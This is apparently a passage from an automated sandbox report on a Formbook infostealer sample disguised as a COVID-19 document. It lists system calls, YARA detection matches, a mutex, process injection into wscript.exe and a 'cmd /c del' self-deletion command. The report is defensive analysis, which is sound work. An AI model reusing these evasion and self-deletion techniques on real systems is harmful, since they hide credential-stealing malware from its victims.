          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B09820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B0B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B0A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B09B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B09A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B09A10 NtQuerySection,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B095F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B0AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B09520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B09560 NtWriteFile,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B09FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B09730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B0A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B0A770 NtOpenThread,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B09770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B09760 NtOpenProcess,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B096D0 NtCreateKey,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B09610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B09670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B09650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DEAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DEA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DEA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DEB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DEA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B2A060 NtClose,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B2A110 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B29FE0 NtReadFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B29F30 NtCreateFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B29FDC NtReadFile,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 1_2_018FC194
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 1_2_018FEB28
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 1_2_018FEB38
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_0041E85C
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_00401030
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_0041E17E
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_0041D189
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_0041D587
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_00402D88
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_00402D90
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_00409E40
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_00402FB0
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AE4120
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01ACF900
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF20A0
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B920A8
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01ADB090
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B928EC
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B9E824
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B81002
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AFEBB0
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B803DA
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B8DBD2
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B92B28
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B922AE
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF2581
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01ADD5E0
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B925DD
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AC0D20
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B92D07
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B91D55
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD841F
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B8D466
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B91FF1
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B9DFCE
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B92EF7
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AE6E30
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B8D616
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E6D466
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB841F
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E725DD
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DBD5E0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD2581
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E71D55
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E72D07
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DA0D20
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E72EF7
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DC6E30
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E6D616
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E71FF1
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E7DFCE
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E728EC
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DBB090
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E720A8
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD20A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E7E824
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E61002
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DAF900
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DC4120
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E722AE
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E6DBD2
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DDEBB0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E72B28
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B2E85C
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B2E17E
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B12D90
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B12D88
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B19E40
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B12FB0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 04DAB150 appears 35 times
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: String function: 01ACB150 appears 35 times
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.430989730.0000000000F64000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCo2vKXXLQkGY.exe@ vs COVID-19-Related Requirements.exe
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.433207699.0000000003333000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWindowsNetwork.dll> vs COVID-19-Related Requirements.exe
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.433207699.0000000003333000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs COVID-19-Related Requirements.exe
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.448500832.0000000007780000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs COVID-19-Related Requirements.exe
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.432940661.0000000003291000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs COVID-19-Related Requirements.exe
          Source: COVID-19-Related Requirements.exe, 0000000D.00000000.427927529.00000000003C4000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCo2vKXXLQkGY.exe@ vs COVID-19-Related Requirements.exe
          Source: COVID-19-Related Requirements.exe, 0000000E.00000002.429267857.00000000002B4000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCo2vKXXLQkGY.exe@ vs COVID-19-Related Requirements.exe
          Source: COVID-19-Related Requirements.exe, 0000000F.00000002.487052680.0000000001BBF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs COVID-19-Related Requirements.exe
          Source: COVID-19-Related Requirements.exe, 0000000F.00000000.429960231.0000000000FB4000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCo2vKXXLQkGY.exe@ vs COVID-19-Related Requirements.exe
          Source: COVID-19-Related Requirements.exe, 0000000F.00000002.485075034.00000000019E0000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs COVID-19-Related Requirements.exe
          Source: COVID-19-Related Requirements.exeBinary or memory string: OriginalFilenameCo2vKXXLQkGY.exe@ vs COVID-19-Related Requirements.exe
          Source: COVID-19-Related Requirements.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 0000000F.00000002.481749515.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.481749515.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.484219002.0000000001960000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.484219002.0000000001960000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.484584798.0000000001990000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.484584798.0000000001990000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.597531412.0000000002F80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.597531412.0000000002F80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.597396184.0000000002F50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.597396184.0000000002F50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.434950366.0000000004299000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.434950366.0000000004299000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.596048220.0000000000B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.596048220.0000000000B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 15.2.COVID-19-Related Requirements.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 15.2.COVID-19-Related Requirements.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 15.2.COVID-19-Related Requirements.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 15.2.COVID-19-Related Requirements.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: COVID-19-Related Requirements.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: COVID-19-Related Requirements.exe, Reboot_IMG/AreaCaptureForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 1.0.COVID-19-Related Requirements.exe.ef0000.0.unpack, Reboot_IMG/AreaCaptureForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 1.2.COVID-19-Related Requirements.exe.ef0000.0.unpack, Reboot_IMG/AreaCaptureForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 13.0.COVID-19-Related Requirements.exe.350000.0.unpack, Reboot_IMG/AreaCaptureForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 13.2.COVID-19-Related Requirements.exe.350000.0.unpack, Reboot_IMG/AreaCaptureForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 14.0.COVID-19-Related Requirements.exe.240000.0.unpack, Reboot_IMG/AreaCaptureForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: classification engineClassification label: mal100.troj.evad.winEXE@11/1@1/1
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\COVID-19-Related Requirements.exe.logJump to behavior
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeMutant created: \Sessions\1\BaseNamedObjects\KggIKjEuKlfWFkr
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1340:120:WilError_01
          Source: COVID-19-Related Requirements.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: COVID-19-Related Requirements.exeVirustotal: Detection: 23%
          Source: COVID-19-Related Requirements.exeReversingLabs: Detection: 25%
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeFile read: C:\Users\user\Desktop\COVID-19-Related Requirements.exe:Zone.IdentifierJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\COVID-19-Related Requirements.exe 'C:\Users\user\Desktop\COVID-19-Related Requirements.exe'
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess created: C:\Users\user\Desktop\COVID-19-Related Requirements.exe {path}
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess created: C:\Users\user\Desktop\COVID-19-Related Requirements.exe {path}
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess created: C:\Users\user\Desktop\COVID-19-Related Requirements.exe {path}
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\COVID-19-Related Requirements.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess created: C:\Users\user\Desktop\COVID-19-Related Requirements.exe {path}
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess created: C:\Users\user\Desktop\COVID-19-Related Requirements.exe {path}
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess created: C:\Users\user\Desktop\COVID-19-Related Requirements.exe {path}
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\COVID-19-Related Requirements.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: COVID-19-Related Requirements.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: COVID-19-Related Requirements.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscript.pdbGCTL source: COVID-19-Related Requirements.exe, 0000000F.00000002.485075034.00000000019E0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000010.00000000.460588172.0000000007CA0000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: COVID-19-Related Requirements.exe, 0000000F.00000002.485261731.0000000001AA0000.00000040.00000001.sdmp, wscript.exe, 00000013.00000002.598596904.0000000004E9F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: COVID-19-Related Requirements.exe, wscript.exe
          Source: Binary string: wscript.pdb source: COVID-19-Related Requirements.exe, 0000000F.00000002.485075034.00000000019E0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000010.00000000.460588172.0000000007CA0000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 1_2_00EF6EF1 push cs; ret
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 1_2_018FE4E8 pushad ; ret
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 13_2_00356EF1 push cs; ret
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 14_2_00246EF1 push cs; ret
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_0041687A push ebp; retf
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_0041D0D2 push eax; ret
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_0041D0DB push eax; ret
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_004048E6 push ebx; retf
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_0041D085 push eax; ret
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_0041D13C push eax; ret
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_004164BA pushfd ; retf
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_004165A3 push ds; iretd
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_0041A5B5 push eax; retf
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_00416FEF push edi; iretd
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_00F46EF1 push cs; ret
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B1D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DFD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B2D085 push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B148E6 push ebx; retf
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B2D0D2 push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B2D0DB push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B2687A push ebp; retf
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B2D13C push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B264BA pushfd ; retf
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B2A5B5 push eax; retf
